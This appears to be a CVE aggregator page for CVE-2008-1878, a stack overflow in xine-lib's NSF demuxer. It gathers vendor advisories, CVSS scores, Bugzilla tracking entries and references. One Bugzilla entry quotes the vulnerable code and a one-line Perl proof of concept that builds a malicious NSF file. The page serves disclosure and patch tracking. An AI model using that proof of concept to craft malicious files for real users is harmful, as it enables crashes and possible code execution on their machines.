CVE-2008-1878
published 2008-04-17CVE-2008-1878: Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c in xine-lib 1.1.12 and earlier allows remote attackers to cause a…
PriorityP350high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
15.04%
96.3th percentile
Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c in xine-lib 1.1.12 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long NSF title.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xine | xine-lib | <= 1.1.12 | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
| xine | xine-lib | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
vendor_ubuntu6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
xine-lib vulnerabilities
vendor_ubuntu·2008-08-06·CVSS 6.8
CVE-2008-0073 [MEDIUM] xine-lib vulnerabilities
Title: xine-lib vulnerabilities
Summary: xine-lib vulnerabilities
Alin Rad Pop discovered an array index vulnerability in the SDP
parser. If a user or automated system were tricked into opening a
malicious RTSP stream, a remote attacker may be able to execute
arbitrary code with the privileges of the user invoking the program.
(CVE-2008-0073)
Luigi Auriemma discovered that xine-lib did not properly check
buffer sizes in the RTSP header-handling code. If xine-lib opened an
RTSP stream with crafted SDP attributes, a remote attacker may be
able to execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-0225, CVE-2008-0238)
Damian Frizza and Alfredo Ortega discovered that xine-lib did not
properly validate FLAC tags. If a user or automated system were
tricked
Red Hat
xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
vendor_redhat·2008-04-17·CVSS 7.5
CVE-2008-1878 [HIGH] xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c in xine-lib 1.1.12 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long NSF title.
GHSA
GHSA-22c4-4rv3-jj9h: Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf
ghsa_unreviewed·2022-05-01
CVE-2008-1878 [HIGH] CWE-119 GHSA-22c4-4rv3-jj9h: Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf
Stack-based buffer overflow in the demux_nsf_send_chunk function in src/demuxers/demux_nsf.c in xine-lib 1.1.12 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long NSF title.
GHSA
GHSA-7jwc-8h4q-2fgv: ** DISPUTED ** Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2008-1964 [HIGH] CWE-119 GHSA-7jwc-8h4q-2fgv: ** DISPUTED ** Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf
** DISPUTED ** Stack-based buffer overflow in the demux_nsf_send_headers function in src/demuxers/demux_nsf.c in xine-lib allows remote attackers to have an unknown impact via a long copyright field in an NSF header in an NES Sound file, a different issue than CVE-2008-1878. NOTE: a third party claims that the copyright field always has a safe length.
No detection rules found.
Bugzilla
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer [EPEL-5]
bugzilla·2008-04-24·CVSS 7.5
CVE-2008-1878 [HIGH] CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer [EPEL-5]
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer [EPEL-5]
+++ This bug was initially created as a clone of Bug #443056 +++
This is an automatically created tracking bug! It was created to ensure that one
or more security vulnerabilities are fixed in all affected branches.
You should *not* refer to this bug publicly, as it is a private "Fedora Project
Contributors" bug.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in "Blocks" field.
bug #442882: CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer
Discussion:
%changelog
* Thu Apr 24 2008 Rex Dieter - 1.1.8-9
- CVE-2008-1878 (#443969)
---
http://buildsys.fedoraproject.org/build-status/job.psp?uid=38835
Bugzilla
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
bugzilla·2008-04-17·CVSS 7.5
CVE-2008-1878 [HIGH] CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
CVE-2008-1878 xine-lib: buffer overflow in nsf demuxer (CVE-2008-1964)
Guido Landi reported following xine-lib issue to Full-Disclosure mailing list:
xine-lib title = strdup(&header[0x0E]);
demux_nsf_send_chunk():
122: char title[100];
162: sprintf(title, "%s, song %d/%d",
this->title, this->current_song, this->total_songs);
- Affected applications
http://xinehq.de/index.php/releases
- PoC
perl -e 'print "\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" .
"\x41" x 114' > evil.mp3
Reference:
http://marc.info/?l=full-disclosure&m=120839374812553&w=4
Does not seem to be fixed upstream yet. Overflow is caught by stack protector.
Discussion:
Created attachment 302736
Reporter's PoC
---
Exploit is now also on milw0rm:
http://milw0rm.com/exploits/5458
---
Upstream pat
http://lists.opensuse.org/opensuse-security-announce/2008-06/msg00001.htmlhttp://secunia.com/advisories/29850http://secunia.com/advisories/30021http://secunia.com/advisories/30337http://secunia.com/advisories/30581http://secunia.com/advisories/31372http://secunia.com/advisories/31393http://security.gentoo.org/glsa/glsa-200808-01.xmlhttp://www.debian.org/security/2008/dsa-1586http://www.mandriva.com/security/advisories?name=MDVSA-2008:177http://www.mandriva.com/security/advisories?name=MDVSA-2008:178http://www.securityfocus.com/bid/28816http://www.ubuntu.com/usn/usn-635-1http://www.vupen.com/english/advisories/2008/1247/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41865https://www.exploit-db.com/exploits/5458https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00536.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-April/msg00571.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-06/msg00001.htmlhttp://secunia.com/advisories/29850http://secunia.com/advisories/30021http://secunia.com/advisories/30337http://secunia.com/advisories/30581http://secunia.com/advisories/31372http://secunia.com/advisories/31393http://security.gentoo.org/glsa/glsa-200808-01.xmlhttp://www.debian.org/security/2008/dsa-1586http://www.mandriva.com/security/advisories?name=MDVSA-2008:177http://www.mandriva.com/security/advisories?name=MDVSA-2008:178http://www.securityfocus.com/bid/28816http://www.ubuntu.com/usn/usn-635-1http://www.vupen.com/english/advisories/2008/1247/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41865https://www.exploit-db.com/exploits/5458https://www.redhat.com/archives/fedora-package-announce/2008-April/msg00536.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-April/msg00571.html
2008-04-17
Published